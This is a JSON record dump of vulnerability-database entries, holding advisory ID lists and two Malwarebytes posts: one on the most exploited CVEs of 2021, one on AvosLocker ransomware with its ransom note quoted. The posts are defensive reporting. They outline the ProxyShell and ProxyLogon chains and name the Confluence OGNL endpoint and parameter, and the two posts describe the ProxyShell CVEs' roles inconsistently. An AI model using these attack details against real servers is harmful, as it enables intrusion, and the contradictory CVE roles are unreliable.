"THREATPOST:5CCE0C2607242B16B2880B331167526C", "THREATPOST:5F6690E820E1B143D99DD5974300C6FF", "THREATPOST:604B67FD6EFB0E72DDD87DF07C8F456D", "THREATPOST:6067B6D35C99BFCFF226177541A31F69", "THREATPOST:647D7D894452D9C46B3E86F5491EED49", "THREATPOST:65DB14FD89BCDBD3391ADD70F1377E70", "THREATPOST:65F4E74D349524EBAC2DA4A4ECF22DD8", "THREATPOST:6675B640474BF8A8A3D049DB0266A118", "THREATPOST:66848A3C9B8917C8F84DFDC04DD5F6D9", "THREATPOST:677D5A0A56D06021C8EF30D0361579C6", "THREATPOST:68B92CE2FE5B31FB78327BDD0AB7F21C", "THREATPOST:6B7259AD7487C6D17E0A301E14AEB7CB", "THREATPOST:6C547AAC30142F12565AB289E211C079", "THREATPOST:6D28B6E17A92FE11F55907C143B3F5DD", "THREATPOST:6EA5AB7FCD767A01EA56D7EEF6DA0B0A", "THREATPOST:705B9DD7E8602B9F2F913955E25C2550", "THREATPOST:71C45E867DCD99278A38088B59938B48", "THREATPOST:736F24485446EFF3B3797B31CE9DAF1D", "THREATPOST:751A0E2371F134F90F39C20AB70C1E2A", 
"THREATPOST:76A072EE53232EB197F119EC2F7EAA74", "THREATPOST:76A5549135F9D578FFC2C8FACC135193", "THREATPOST:779B904F971138531725D1E57FDFF9DD", "THREATPOST:77DB31E826E03EA9D78EE4777986EA49", "THREATPOST:78327DA051387C43A61D82DE6B618D1F", "THREATPOST:795C39123EE147B39072C9434899E8FE", "THREATPOST:796DFA4804FEF04D3787893FCDFF97D2", "THREATPOST:7BCCC5B4AA7FB7724466FFAB585EC55D", "THREATPOST:7DDE7BA7A7916763BDDB5D0C565285DA", "THREATPOST:7E76268AD6AABF30EEE441619FF98ABF", "THREATPOST:81021088670E95FC0EBB2F53E1FB2AD2", "THREATPOST:8105FA1422BB4E02CD95C23CC7405E26", "THREATPOST:81DEAED9A2A367373ADA49F1CCDCA95D", "THREATPOST:8243943141B8F18343765DA77D33F46C", "THREATPOST:836083DB3E61D979644AE68257229776", "THREATPOST:83C349A256695022C2417F465CEB3BB2", "THREATPOST:8594A8F12FC5C97E7E62AF7B9BE3F1AA", "THREATPOST:8601D6EF6AB3201E582A218391B19C3F", "THREATPOST:8648A1E46B6EBE5300881DE285C7D080", "THREATPOST:870C912F079364DE3A8DADFDBE4E42D1", "THREATPOST:883A7DED46A4E1C743AFFBA7CDCF4400", "THREATPOST:891CC19008EEE7B8F1523A2BD4A37993", "THREATPOST:89AA48C3C48FA427AB660EDEE6DBCBE2", "THREATPOST:8A372065BFA1E6839DAF0386E9D8A1F5", "THREATPOST:8A56F3FFA956FB0BB2BB4CE451C3532C", "THREATPOST:8B78588647E8548B06361DBB1F279468", "THREATPOST:8C45AF2306CB954ACB231C2C0C5EDA9E", "THREATPOST:8D57BD39C913E8DDC450DD9EF2564C2C", "THREATPOST:8D6D4C10987CBF3434080EFF240D2E74", "THREATPOST:8E47F9D5A51C75BA6BB0A1E286296563", "THREATPOST:8FFF44C70736D8E21796B9337E52F29D", "THREATPOST:927CAECDA58E6BC3266D14FE340589BB", "THREATPOST:932AA74F12B9D2AD0E8589AC1A2C1438", "THREATPOST:9374ECD9CCFC891FC2F3B85DF0905A1C", "THREATPOST:95BDCA2096B58A0697E169C01B1E0F09", "THREATPOST:970C9E73DF1FF53D70DB0B66326F3CB0", "THREATPOST:97D06649A596B5E25E2A11E3D275748B", "THREATPOST:97F7CB48069CDF8038E5E49508EFA458", "THREATPOST:985BD7D2744A9AA9EC43C5DDCD561812", "THREATPOST:987673B6BC03D7371ADC88E9BDA270D5", "THREATPOST:98AF08B524D08ABCEB115FECEE99B70F", "THREATPOST:98D815423018872E6E596DAA8131BF3F", 
"THREATPOST:98F735BF442C3126E4A9FFBB60517B96", "THREATPOST:9922BFA77AFE6A6D35DFEA77A4D195C0", "THREATPOST:99AD02BEC4B8423B8E050E0A4E9C4DEB", "THREATPOST:99C6C1555ACD07B4925765AED21A360C", "THREATPOST:9AF5E0BBCEF3F8F871ED50F3A8A604A9", "THREATPOST:9D96113FADFD4FBCA9C17B78B53A8C93", "THREATPOST:9E222E9232D1D59183559B17E97BADCD", "THREATPOST:A07707C9B30B86A691C1A24C4DC65EE6", "THREATPOST:A1A1E1AC8DB384C8FA2988F9A9121141", "THREATPOST:A1F3E8AC4878C11E48F90AC47D165F52", "THREATPOST:A298611BE0D737083D0CFFE084BEC006", "THREATPOST:A2FE619CD27EBEC2F6B0C62ED026F02C", "THREATPOST:A47D83D4BBBE115E6424755328525B9D", "THREATPOST:A4C1190B664DAE144A62459611AC5F4A", "THREATPOST:A5FC4C5797CA53E30A3426AF0843BFFE", "THREATPOST:A6096ACCB3F0C38BC6570E1DDE3E8844", "THREATPOST:A98C64CB9BDDE55F51C984B749753904", "THREATPOST:AB54F1EB518D88546D1EF9DBA5E1874B", "THREATPOST:AD4EF56E5440159F6E37D8B403C253D7", "THREATPOST:AD8A075328874910E8DCBC149A6CA284", "THREATPOST:AE9B4708A7A9B6F3A24C35E15C6150A4", "THREATPOST:AFD74E86954C5A08B3F246887333BDF3", "THREATPOST:B047BB0FECBD43E30365375959B09B04", "THREATPOST:B04DD1402960F4726546F62371A02B3C", "THREATPOST:B11E42D0B4C56E4CC482DEF6EA0B4AC7", "THREATPOST:B25070E6CF075EEA6B20C4D8D25ADBE8", "THREATPOST:B2FEDF3EA50507F526C77105093E8977", "THREATPOST:B318814572E066732E6C32CC147D95E2", "THREATPOST:B3A92C43D5FF3C53BE8EF06C687B80B6", "THREATPOST:B787E57D67AB2F76B899BCC525FF6870", "THREATPOST:B796D491D9E59A6CE14A74FFE427D175", "THREATPOST:B7C8B7F3016D73355C4ED5E05B0E8490", "THREATPOST:B9CCF4B8B7E25CEC369B248303882707", "THREATPOST:BA0FA5036C385C822C787514850A67E5", "THREATPOST:BADA213290027D414693E838771F8645", "THREATPOST:BBAE8AE32C2E8EC0271BBA9D0498A825", "THREATPOST:BC99709891AA93FC7767B53445FC2736", "THREATPOST:BD8DD789987BFB9BE93AA8FD73E98B40", "THREATPOST:BDCC3D007E103708BD7CA085B29EF2CB", "THREATPOST:BE0B5E93BD5FBBCB893FDDFE5348FDE9", "THREATPOST:BE11CFFFFEA1B470C8A24CA24D76A7C6", "THREATPOST:C23B7DE85B27B6A8707D0016592B87A3", 
"THREATPOST:C3C8E90FB9A6A06B1692D70A51973560", "THREATPOST:C4369D60DE77B747298623D4FD0299B3", "THREATPOST:C4B358E42FF02B710BE90F363212C84F", "THREATPOST:C535D98924152E648A3633199DAC0F1E", "THREATPOST:C573D419AD6106E6579CCA4A18E2DBBE", "THREATPOST:C694354BA14A953DAFC9171CB97F0BC2", "THREATPOST:C6D292755B4D35E7E0FD459BBF6AFC7F", "THREATPOST:C754ECCAF3F8A3E6BCD670A88B3E4CAA", "THREATPOST:C9D2DB62AC17B411BFFF253D149E56F2", "THREATPOST:C9FBCC2A1C52CDB54C6AAB18987100F4", "THREATPOST:CAA77BB0CF0093962ECDD09004546CA3", "THREATPOST:CAA9AA939562959323A4675228C233A5", "THREATPOST:CD9589D22198CE38A27B7D1434FEE963", "THREATPOST:CEEE25A4A4491980FA1ECB491795DBA9", "THREATPOST:CF3033203781AAC4EAAE83DDCF93ADE8", "THREATPOST:CF4E98EC11A9E5961C991FE8C769544E", "THREATPOST:CF93F3E6D1E96AACFAEE9602C90A711D", "THREATPOST:D098942E4435832E619282E1B92C9E0F", "THREATPOST:D240DF7FEF328139784DBE743FF84E9B", "THREATPOST:D358CF7B956451F0C53F878AF811409F", "THREATPOST:D5E02B5FD2809DCACF41DA1190794921", "THREATPOST:D7D5E283A1FBB50F8BD8797B0D60A622", "THREATPOST:DB4349EAC3DD60D03D1EBDEFF8ABAA8E", "THREATPOST:DBA639CBD82839FDE8E9F4AE1031AAF7", "THREATPOST:DC270F423257A4E0C44191BE365F25CB", "THREATPOST:DC76A72269F271882F45A521CF7C3509", "THREATPOST:DD0FE8D3D9D205FA5CCA65C3EBDD62D2", "THREATPOST:DDB6E2767CFC8FF972505D4C12E6AB6B", "THREATPOST:DE6A0C7ECE2973F596891B00DC078055", "THREATPOST:DF2C6B28792FEC8F2404A7DC366B848F", "THREATPOST:DF7C78725F19B2637603E423E56656D4", "THREATPOST:E09CE3FA2B76F03886BA3C2D4DB4D8DB", "THREATPOST:E0C8A3622AEF61D726EED997C39BADFE", "THREATPOST:E424D9CD1C692F91FBD97FDDEDBCCE34", "THREATPOST:E60D2D0CCA5A225CA4BF5CEB5C7C3F59", "THREATPOST:E8074A338A246BED98CF95AD4F4E9CAF", "THREATPOST:E8A3AD011F9759F38AAB48D776396878", "THREATPOST:E95FF75420C541DF65D4D795CF73B5CE", "THREATPOST:EA093948BFD7033F5C9DB5B3199BEED4", "THREATPOST:EC28F82F6C3ECD5D0BA7471D5BA50FD6", "THREATPOST:EDFBDF12942A6080DE3FAE980A53F496", "THREATPOST:EE0A71A925297032000651C344890BDD", 
"THREATPOST:EE9C0062A3E6400BAF159BCA26EABB34", "THREATPOST:F1065D29808C9165285986CCB6DEBB5A", "THREATPOST:F12423DD382283B0E48D4852237679FC", "THREATPOST:F54F8338674294DE3D323ED03140CB71", "THREATPOST:F60D403369A535076F39A474F74C925E", "THREATPOST:F72FDE7CB5D697EFD089937D42475E50", "THREATPOST:F87A6E1CF3889C526FDE8CE50A1B81FF", "THREATPOST:F8F0749C57FDD3CABE842BDFEAD33452", "THREATPOST:F9CF34A304B5CA2189D5CEDA09C8B0CB", "THREATPOST:FC38FE49CDC6DFAD4E78D669DBFA5687", "THREATPOST:FDD0C98FAA16831E7A3B7CCE3BFC67FF", "THREATPOST:FDF0EE0C54F947C5167E6B227E92AE63", "THREATPOST:FE41B3825C6A9EE91B00CDADD2AF9147", "THREATPOST:FE7B13B35ED49736C88C39D5279FA3D1"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:1333714193E63A3E616DE66054C5D640", "TRENDMICROBLOG:608F794950B54766A75ABA93823701D0", "TRENDMICROBLOG:8A87E8F1BA63B9BB2E84C23288C44FDC", "TRENDMICROBLOG:9BC812C1F699A6136F37C0ACE6451F20", "TRENDMICROBLOG:C00F7F935E0D1EAD0509B4C376B20A1F", "TRENDMICROBLOG:C927C873A9E9A7AF6B74D64EFAFA6B02"]}, {"type": "typo3", "idList": ["TYPO3-PSA-2021-004"]}, {"type": "ubuntu", "idList": ["USN-4510-1", "USN-4510-2", "USN-4559-1", "USN-5192-1", "USN-5192-2", "USN-5197-1"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2020-1472", "UB:CVE-2021-4104", "UB:CVE-2021-44228", "UB:CVE-2021-45046"]}, {"type": "veracode", "idList": ["VERACODE:27548", "VERACODE:33244", "VERACODE:33337", "VERACODE:33348"]}, {"type": "vmware", "idList": ["VMSA-2021-0002", "VMSA-2021-0028.1", "VMSA-2021-0028.10", "VMSA-2021-0028.11", "VMSA-2021-0028.12", "VMSA-2021-0028.13", "VMSA-2021-0028.2", "VMSA-2021-0028.3", "VMSA-2021-0028.4", "VMSA-2021-0028.6", "VMSA-2021-0028.7", "VMSA-2021-0028.8", "VMSA-2021-0028.9"]}, {"type": "wallarmlab", "idList": ["WALLARMLAB:060FBB90648BCDE11554492408AE89C8", "WALLARMLAB:1493380EEC54B493CC22B4FA116139BB", "WALLARMLAB:2AAA5E62EED6807B93FB40361B4927CB", "WALLARMLAB:7A0E7E3752712070F3E75CEF26AC2CC0", "WALLARMLAB:90D3FFE69FF928689D36310EF8B1C4F3", 
"WALLARMLAB:C5940EBF622709A929825B8B12592EF5", "WALLARMLAB:E86F01AF50087BEB03AAB46947CDE884"]}, {"type": "wordfence", "idList": ["WORDFENCE:45390D67D024DD8C963E18DAE88303B2"]}, {"type": "zdi", "idList": ["ZDI-20-258", "ZDI-21-819", "ZDI-21-821", "ZDI-21-822"]}, {"type": "zdt", "idList": ["1337DAY-ID-33133", "1337DAY-ID-33134", "1337DAY-ID-33140", "1337DAY-ID-34037", "1337DAY-ID-34051", "1337DAY-ID-34553", "1337DAY-ID-35274", "1337DAY-ID-35863", "1337DAY-ID-35879", "1337DAY-ID-35912", "1337DAY-ID-35944", "1337DAY-ID-36024", "1337DAY-ID-36262", "1337DAY-ID-36281", "1337DAY-ID-36472", "1337DAY-ID-36667", "1337DAY-ID-36694", "1337DAY-ID-36730", "1337DAY-ID-37080", "1337DAY-ID-37135", "1337DAY-ID-37136", "1337DAY-ID-37228", "1337DAY-ID-37257", "1337DAY-ID-37264", "1337DAY-ID-37781", "1337DAY-ID-37889"]}]}, "epss": [{"cve": "CVE-2018-13379", "epss": "0.974950000", "percentile": "0.999510000", "modified": "2023-03-19"}, {"cve": "CVE-2019-11510", "epss": "0.975040000", "percentile": "0.999580000", "modified": "2023-03-19"}, {"cve": "CVE-2020-0688", "epss": "0.974270000", "percentile": "0.998740000", "modified": "2023-03-19"}, {"cve": "CVE-2020-1472", "epss": "0.973850000", "percentile": "0.998190000", "modified": "2023-03-19"}, {"cve": "CVE-2021-21972", "epss": "0.973850000", "percentile": "0.998190000", "modified": "2023-03-19"}, {"cve": "CVE-2021-26084", "epss": "0.974760000", "percentile": "0.999340000", "modified": "2023-03-19"}, {"cve": "CVE-2021-26855", "epss": "0.975430000", "percentile": "0.999880000", "modified": "2023-03-19"}, {"cve": "CVE-2021-26857", "epss": "0.053690000", "percentile": "0.918980000", "modified": "2023-03-19"}, {"cve": "CVE-2021-26858", "epss": "0.106070000", "percentile": "0.940940000", "modified": "2023-03-19"}, {"cve": "CVE-2021-27065", "epss": "0.943940000", "percentile": "0.986930000", "modified": "2023-03-19"}, {"cve": "CVE-2021-31207", "epss": "0.971850000", "percentile": "0.996470000", "modified": "2023-03-19"}, {"cve": 
"CVE-2021-34473", "epss": "0.974090000", "percentile": "0.998470000", "modified": "2023-03-19"}, {"cve": "CVE-2021-34523", "epss": "0.975070000", "percentile": "0.999600000", "modified": "2023-03-19"}, {"cve": "CVE-2021-40539", "epss": "0.975260000", "percentile": "0.999760000", "modified": "2023-03-19"}, {"cve": "CVE-2021-44228", "epss": "0.975780000", "percentile": "0.999980000", "modified": "2023-03-19"}], "vulnersScore": 0.7}, "_state": {"dependencies": 1659994789, "score": 1698845847, "epss": 1679291388}, "_internal": {"score_hash": "5a120661f46eda0e286b7a8f8fddf8c0"}}
{"malwarebytes": [{"lastseen": "2022-04-29T18:23:40", "description": "A joint Cybersecurity Advisory, coauthored by cybersecurity authorities of the United States (CISA, NSA, and FBI), Australia (ACSC), Canada (CCCS), New Zealand (NZ NCSC), and the United Kingdom (NCSC-UK) has detailed the top 15 Common Vulnerabilities and Exposures (CVEs) routinely exploited by malicious cyber actors in 2021, as well as other CVEs frequently exploited.\n\nPublicly disclosed computer security flaws are listed in the Common Vulnerabilities and Exposures (CVE) database. Its goal is to make it easier to share data across separate vulnerability capabilities (tools, databases, and services). These are the CVEs that made it into the top 10.\n\n## 1\\. Log4Shell\n\n[CVE-2021-44228](<https://nvd.nist.gov/vuln/detail/CVE-2021-44228>), commonly referred to as [Log4Shell](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/12/log4j-zero-day-log4shell-arrives-just-in-time-to-ruin-your-weekend/>) or Logjam. This was a software flaw in the Apache Log4j logging utility. A logger is a piece of software that logs every event that happens in a computer system. The records it produces are useful for IT and security folks to trace errors or check any abnormal behavior within a system.\n\nWhen Log4Shell emerged in December 2021, what caught many by surprise was the enormous number of applications and web services, including those offered by Twitter, Apple, Google, Amazon, Steam, and Microsoft, among others, that were relying on Log4j, many of which inherited the vulnerability.\n\nThis made for an exceptionally broad attack surface. Combine that with an incredibly easy to use exploit and there should be no surprise that this vulnerability made it to the top of the list.\n\nThe Cybersecurity and Infrastructure Security Agency (CISA) has launched an open source scanner to find applications that are vulnerable to the Log4j vulnerabilities listed as CVE-2021-44228 and CVE-2021-45046. 
The [CISA Log4j scanner](<https://github.com/cisagov/log4j-scanner>) is based on other open source tools and supports scanning lists of URLs, several fuzzing options, DNS callback, and payloads to circumvent web-application firewalls.\n\n## 2\\. CVE-2021-40539\n\n[CVE-2021-40539](<https://nvd.nist.gov/vuln/detail/CVE-2021-40539>) is a REST API authentication bypass [vulnerability in ManageEngine\u2019s single sign-on (SSO) solution](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/09/fbi-and-cisa-warn-of-apt-groups-exploiting-adselfservice-plus/>) with resultant remote code execution (RCE) that exists in Zoho ManageEngine ADSelfService Plus version 6113 and prior. When word of this vulnerability came out it was already clear that it was being exploited in the wild. Zoho remarked that it was noticing indications of this vulnerability being exploited. Other researchers chimed in saying the attacks had thus far been highly targeted and limited, and possibly the work of a single threat actor. It was clear from the start that [APT](<https://blog.malwarebytes.com/glossary/advanced-persistent-threat-apt/>) threat-actors were likely among those exploiting the vulnerability.\n\nThe vulnerability allows an attacker to gain unauthorized access to the product through REST API endpoints by sending a specially crafted request. This allows attackers to carry out subsequent attacks resulting in RCE.\n\nFor those that have never heard of this software, it\u2019s a self-service password management and single sign-on (SSO) solution for Active Directory (AD) and cloud apps. Which means that any attacker that is able to exploit this vulnerability immediately has access to some of the most critical parts of a corporate network. A patch for this vulnerability was made available on September 7, 2021. Users were advised to update to ADSelfService Plus build 6114. 
The FBI, CISA, and CGCYBER also strongly urged organizations to make sure that ADSelfService Plus was not directly accessible from the Internet.\n\nThe [ManageEngine site](<https://www.manageengine.com/products/self-service-password/kb/how-to-fix-authentication-bypass-vulnerability-in-REST-API.html>) has specific instructions on how to identify and update vulnerable installations.\n\n## 3\\. ProxyShell\n\nThird on the list are three vulnerabilities that are commonly grouped together and referred to as [ProxyShell](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/08/patch-now-microsoft-exchange-attacks-target-proxyshell-vulnerabilities/>): [CVE-2021-34473](<https://nvd.nist.gov/vuln/detail/CVE-2021-34473>), [CVE-2021-34523](<https://nvd.nist.gov/vuln/detail/CVE-2021-34523>), and [CVE-2021-31207](<https://nvd.nist.gov/vuln/detail/CVE-2021-31207>).\n\nThe danger lies in the fact that these three vulnerabilities can be chained together to allow an unauthenticated remote attacker to run code on an unpatched Microsoft Exchange server. Attackers use them in this order:\n\n * **Get in** with CVE-2021-34473, a Microsoft Exchange Server remote code execution (RCE) vulnerability: a pre-authentication path confusion in the Autodiscover front end lets a remote user have the server forward requests to arbitrary back-end endpoints without logging in.\n * **Take control** with CVE-2021-34523, a Microsoft Exchange Server elevation of privilege (EoP) vulnerability in the Exchange PowerShell back end: by supplying a crafted access token the attacker runs Exchange cmdlets as any mailbox user, including an administrator.\n * **Do bad things** with CVE-2021-31207, a Microsoft Exchange Server security feature bypass vulnerability: with those privileges the attacker exports a mailbox that contains a web shell to a path under the web root, which turns a mailbox export into an arbitrary file write and, from there, code execution in the context of SYSTEM.\n\nThe vulnerabilities were found in Microsoft Exchange Server, which has a large userbase and which is usually set up as an Internet-facing instance. 
Plus, many publications have provided proof-of-concept (PoC) methodologies which anyone can copy and use.\n\nMicrosoft\u2019s Exchange Server Security Updates from April 2021 (CVE-2021-34473 and CVE-2021-34523) and May 2021 (CVE-2021-31207) remediate all three ProxyShell vulnerabilities; the updates are cumulative, so a server on the May 2021 update or later is covered for the whole chain.\n\n## 4\\. ProxyLogon\n\nAfter the ProxyShell entries we go straight to four vulnerabilities that are grouped under a similar name\u2014[ProxyLogon](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/03/proxylogon-poc-becomes-a-game-of-whack-a-mole/>)\u2014for similar reasons. [CVE-2021-26855](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26855>), [CVE-2021-26857](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26857>), [CVE-2021-26858](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26858>), and [CVE-2021-27065](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-27065>) all share the same description\u2014"This vulnerability is part of an attack chain. The initial attack requires the ability to make an untrusted connection to Exchange server port 443."\n\nWhile the CVE description is the same for the four CVEs, we have learned that CVE-2021-26855 is a server-side request forgery (SSRF) vulnerability in the Exchange front end that lets an unauthenticated attacker send requests to the back end as the Exchange server itself; it was used to steal mailbox content. CVE-2021-26857 is an insecure deserialization vulnerability in the Unified Messaging service that was used to run code under the SYSTEM account. The other two zero-day flaws\u2014CVE-2021-26858 and CVE-2021-27065\u2014are post-authentication arbitrary file writes: once the SSRF has supplied the authentication, they let an attacker write a file to any part of the server, which is how the web shells were dropped.\n\nTogether these four vulnerabilities form an attack chain that only requires the attacker to find the server running Exchange and the email address of the account from which they want to extract email. After exploiting these vulnerabilities to gain initial access, threat actors deployed web shells on the compromised servers to gain persistence and make more changes. 
Web shells can allow attackers to steal data and perform additional malicious actions.\n\nProxyLogon started out as a limited and targeted attack method attributed to a group called [Hafnium](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/03/patch-now-exchange-servers-attacked-by-hafnium-zero-days/>). Unfortunately it went from limited and targeted attacks to a full-size panic in no time. Attackers started using the Exchange bugs to access vulnerable servers before establishing web shells to gain persistence and steal information.\n\nMicrosoft has released a one-click mitigation tool for Exchange Server deployments. The Microsoft Exchange On-Premises Mitigation Tool is an interim mitigation for customers who do not have dedicated security or IT teams and have not yet applied the security updates: it mitigates CVE-2021-26855 with a URL rewrite rule and scans the server for known web shells, but it does not replace installing the updates. Details, a [download link](<https://aka.ms/eomt>), user instructions, and more information can be found in the [Microsoft Security Response Center](<https://msrc-blog.microsoft.com/2021/03/15/one-click-microsoft-exchange-on-premises-mitigation-tool-march-2021/>).\n\n## 5\\. CVE-2021-26084\n\n[CVE-2021-26084](<https://nvd.nist.gov/vuln/detail/CVE-2021-26084>) is an Object-Graph Navigation Language (OGNL) injection vulnerability that exists in some versions of [Confluence Server and Data Center](<https://confluence.atlassian.com/doc/confluence-security-advisory-2021-08-25-1077906215.html>) that can allow an unauthenticated attacker to execute arbitrary code on a Confluence Server or Data Center instance. Atlassian published its advisory and fixed versions on August 25, 2021; a public proof of concept appeared within the week, in-the-wild exploitation followed almost immediately, and CISA warned of active exploitation in early September. 
An attacker could exploit the vulnerability by sending a single HTTP request to a vulnerable install: the OGNL expression is placed in a request parameter (the public exploits used the `queryString` parameter of the unauthenticated page-variables endpoint `/pages/doenterpagevariables.action`) and is evaluated on the server.\n\nShortly after the vulnerability was disclosed and a patch came out, researchers noticed massive scanning activity for vulnerable instances and crypto-miners started to use the vulnerability to run their code on unpatched servers.\n\nOn the [Confluence Support website](<https://confluence.atlassian.com/doc/confluence-security-advisory-2021-08-25-1077906215.html>) you can find a list of affected versions, instructions to upgrade, and a workaround for those that are unable to upgrade.\n\n## Lessons learned\n\nWhat does this list tell us to look out for in 2022?\n\nWell, first off, if you haven\u2019t patched one of the above we would urgently advise you to do so. And it wouldn\u2019t hurt to continue working down the [list](<https://www.cisa.gov/uscert/ncas/alerts/aa22-117a>) provided by CISA.\n\nSecond, you may have noticed a pattern in what made these vulnerabilities so popular to exploit:\n\n * **A large attack surface**. Popular and widely used software makes for a larger number of potential victims. The money is in the numbers.\n * **Internet-facing instances**. Remember, your Internet-connected software shares the Internet with every basement-dwelling criminal hacker in the world.\n * **Easy exploitability**. 
When vulnerabilities are easy to exploit, and PoCs are publicly available and easy to deploy, the number of potential threat actors goes up.\n\nSo, if you notice or hear about a vulnerability that meets these "requirements", move it to the top of your "to-patch" list.\n\nStay safe, everyone!\n\nThe post [The top 5 most routinely exploited vulnerabilities of 2021](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2022/04/the-top-5-most-routinely-exploited-vulnerabilities-of-2021/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-04-29T16:28:20", "type": "malwarebytes", "title": "The top 5 most routinely exploited vulnerabilities of 2021", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065", "CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523", "CVE-2021-40539", "CVE-2021-44228", "CVE-2021-45046"], "modified": "2022-04-29T16:28:20", "id": "MALWAREBYTES:B8C767042833344389F6158273089954", "href": 
"https://blog.malwarebytes.com/exploits-and-vulnerabilities/2022/04/the-top-5-most-routinely-exploited-vulnerabilities-of-2021/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-21T21:27:45", "description": "The FBI has issued an [advisory](<https://www.ic3.gov/Media/News/2022/220318.pdf>) about the AvosLocker ransomware. Notably, the FBI has noticed that several victims have reported Microsoft Exchange Server vulnerabilities as the intrusion vector. \n\nAvosLocker is a Ransomware as a Service (RaaS) affiliate-based group that has targeted victims across multiple critical infrastructure sectors in the United States including financial services, critical manufacturing, and government facilities.\n\n## Threat profile\n\nAvosLocker ransomware is a multi-threaded Windows executable written in C++ that runs as a console application and shows a log of actions performed on victim systems. AvosLocker ransomware encrypts files on a victim\u2019s server and renames them with the \u201c.avos\u201d extension.\n\nThe AvosLocker executable leaves a ransom note called GET_YOUR_FILES_BACK.txt in all directories where encryption occurs. 
The ransom note includes a .onion site that contains instructions for paying the ransom and receiving a decryption key.\n\n\n\n> _Attention!_\n> \n> _Your systems have been encrypted, and your confidential documents were downloaded._\n> \n> _In order to restore your data, you must pay for the decryption key & application._\n> \n> _You may do so by visiting us at <onion address>._\n> \n> _This is an onion address that you may access using Tor Browser which you may download at <https://www.torproject.org/download/>_\n> \n> _Details such as pricing, how long before the price increases and such will be available to you once you enter your ID presented to you below in this note in our website._\n> \n> _Contact us soon, because those who don\u2019t have their data leaked in our press release blog and the price they\u2019ll have to pay will go up significantly._\n> \n> _The corporations whom don\u2019t pay or fail to respond in a swift manner have their data leaked in our blog, accessible at <onion address>_\n\nSo, besides encrypting your files, AvosLocker also exfiltrates data and threatens to publish the stolen data to its leaks site. The public leak site not only lists victims of AvosLocker, along with a sample of data allegedly stolen from the victim\u2019s network, but also gives visitors an opportunity to view a sample of victim data and to purchase that data.\n\nThe FBI also notes that in some cases, AvosLocker victims receive phone calls from an AvosLocker representative. The caller encourages the victim to go to the .onion site to negotiate, and threatens to post stolen data online. 
In some cases, AvosLocker actors will threaten and execute distributed denial-of-service (DDoS) attacks during negotiations.\n\n## Exchange vulnerabilities\n\nSince AvosLocker is a Ransomware-as-a-Service, which of the vulnerabilities gets used may depend on the affiliate.\n\nThe Exchange Server vulnerabilities are named as: CVE-2021-31207, CVE-2021-34523, CVE-2021-34473, and CVE-2021-26855.\n\n[CVE-2021-31207](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-31207>): a Microsoft Exchange Server security feature bypass vulnerability. The vulnerability allows a remote user to bypass the authentication process. This is the way in.\n\n[CVE-2021-34523](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-34523>): a Microsoft Exchange Server elevation of privilege (EoP) vulnerability. The vulnerability allows a user to raise their permissions. This is how they take control.\n\n[CVE-2021-34473](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-34473>): a Microsoft Exchange Server remote code execution (RCE) vulnerability. The vulnerability allows an authenticated user to execute arbitrary code in the context of SYSTEM and write arbitrary files. This allows the attacker to drop malware on the server and run it.\n\nThis is exactly the same attack chain we [described](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/08/patch-now-microsoft-exchange-attacks-target-proxyshell-vulnerabilities/>) in August 2021. This chain of attack was generally referred to as ProxyShell.\n\nAnother RCE vulnerability in Exchange Server has been seen as well:\n\n[CVE-2021-26855](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26855>): the ProxyLogon vulnerability which we discussed in detail in our article on [Microsoft Exchange attacks causing panic as criminals go shell collecting](<https://blog.malwarebytes.com/malwarebytes-news/2021/03/microsoft-exchange-attacks-cause-panic-as-criminals-go-shell-collecting/>). 
The vulnerability allows an attacker to drop a webshell on a vulnerable Exchange Server. A web shell is a script used by an attacker that allows them to escalate and maintain persistent access on an already compromised web application. (Obviously, not every web shell is malicious, but the non-malicious ones are not interesting to us in this context.)\n\n## Mitigation\n\nAs we stated earlier, all these vulnerabilities have been patched. So, if you are wondering which updates to install next and you are running one or more Microsoft Exchange Server instances, starting there might be a good idea.\n\nMicrosoft\u2019s team has published a [script on GitHub](<https://github.com/microsoft/CSS-Exchange/tree/main/Security>) that can check the status of protection against ProxyLogon vulnerabilities of Exchange servers.\n\n## Detection\n\nMalwarebytes detects AvosLocker as [Ransom.AvosLocker](<https://blog.malwarebytes.com/detections/ransom-avoslocker/>).\n\n_Malwarebytes blocks Ransom.AvosLocker_\n\nStay safe, everyone!\n\nThe post 